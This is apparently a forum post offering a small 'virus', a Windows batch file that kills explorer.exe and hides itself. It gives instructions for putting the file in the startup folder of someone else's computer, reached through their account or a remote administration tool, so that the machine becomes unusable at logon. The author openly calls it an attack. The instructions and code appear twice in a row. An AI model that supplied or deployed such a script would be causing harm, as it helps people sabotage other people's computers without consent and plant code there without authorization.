If you have access to someone else's Windows acount or just somehow can access their computer (for example a Remote Administration Tool) then this is how you use the super virus:
-make a .bat with the code (recomended to use the edit command or notepad for this)
-put it in their startup folder, if you dont know how to then click here
Next time they start their computer (logon) it should run the virus.
The virus makes their computer non usable by killing the proccess explorer.exe and then hides the virus file.
Code:
@echo off
taskkill /f /im explorer.exe
attrib +h %0
If it does not work please tell me and I can try to help you.
NOTE: THIS IS NOT A PRANK OR JOKE IT IS AN ATTACK AND I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS VIRUS
-make a .bat with the code (recomended to use the edit command or notepad for this)
-put it in their startup folder, if you dont know how to then click here
Next time they start their computer (logon) it should run the virus.
The virus makes their computer non usable by killing the proccess explorer.exe and then hides the virus file.
Code:
@echo off
taskkill /f /im explorer.exe
attrib +h %0
If it does not work please tell me and I can try to help you.
NOTE: THIS IS NOT A PRANK OR JOKE IT IS AN ATTACK AND I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS VIRUS